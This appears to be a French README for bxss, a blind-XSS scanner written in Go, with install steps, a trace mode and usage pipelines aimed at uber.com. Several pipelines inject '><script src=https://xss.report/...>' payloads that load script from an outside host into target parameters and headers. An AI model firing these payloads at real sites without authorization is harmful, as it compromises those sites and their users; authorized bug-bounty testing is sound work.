
Blind XSS Scanner est un outil qui peut être utilisé pour scanner les vulnérabilités XSS aveugles dans les applications web.
Bxss est un scanner XSS aveugle haute performance qui automatise la détection des vulnérabilités XSS aveugles dans les applications web.
Nous travaillons activement à l'intégration d'un pool de workers basé sur Chromium pour améliorer les performances de bxss sur les appareils bas de gamme.
Cette fonctionnalité permettra de décharger les tâches gourmandes en ressources, comme la détection XSS basée sur le DOM ou l'inspection des charges utiles après déclenchement, vers des instances Chromium légères gérées via un pool. En répartissant la charge de travail sur plusieurs contextes de navigateur sans tête de manière contrôlée et efficace, bxss restera réactif et utilisable même sur des machines moins puissantes.
Cela rendra bxss non seulement puissant mais aussi très accessible, quelles que soient les contraintes système.
go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest
Le mode Trace est une fonctionnalité expérimentale qui vous permet de suivre où le BlindXSS a été déclenché. Certaines plateformes tierces BlindXSS comme https://xss.report/ vous permettent de spécifier des paramètres personnalisés dans vos charges utiles. Cela vous permet de suivre où le BlindXSS a été déclenché. Par exemple, si vous spécifiez le paramètre url=https://somehost.com dans votre charge utile, l'outil utilisera la charge utile
'"><script src=https://xss.report/c/username?url=https://somehost.com></script>'
pour les tests et lors d'un déclenchement, vous pourrez inspecter le DOM et voir depuis quel hôte le BlindXSS a été déclenché.
Assurez-vous, lors de l'attribution de paramètres personnalisés dans votre tableau de bord, d'attribuer url={LINK} afin que bxss puisse remplacer automatiquement {LINK} par l'URL réelle.
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-t
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-t
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t
subfinder -d uber.com \
| gau \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "X-Forwarded-For"
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t
curl -X GET -H "Authorization: Bearer <Token>" \
-H "X-Secret-Key: <Secret>" \
https://dorki.attaxa.com/api/search?q=site:example.com -s \
| jq -r .[][].url \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>'
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t \
-rl 10
Pour le dorking avancé et l'exploration des vulnérabilités, consultez Dorki et inscrivez-vous dès aujourd'hui !
Si vous obtenez une prime en utilisant cet outil, pensez à me soutenir en m'offrant un café !
| Argument | Description | Default |
|---|
-a | Ajouter la charge utile au paramètre | false |
-c int | Définir le niveau de concurrence | 30 |
-H string | Définir un en-tête personnalisé | "" |
-hf string | Chemin vers un fichier contenant des en-têtes | "" |
-p string | La charge utile XSS aveugle | "" |
-pf string | Chemin vers un fichier contenant des charges utiles | "" |
-t | Tester les paramètres pour XSS aveugle | false |
-X string | Méthode HTTP à utiliser | "" |
-v | Activer le mode débogage | false |
-rl float | Limite de débit (requêtes par seconde) | 0 |
-f | Suivre les redirections | false |
-l | Activer le mode Trace (expérimental) | false |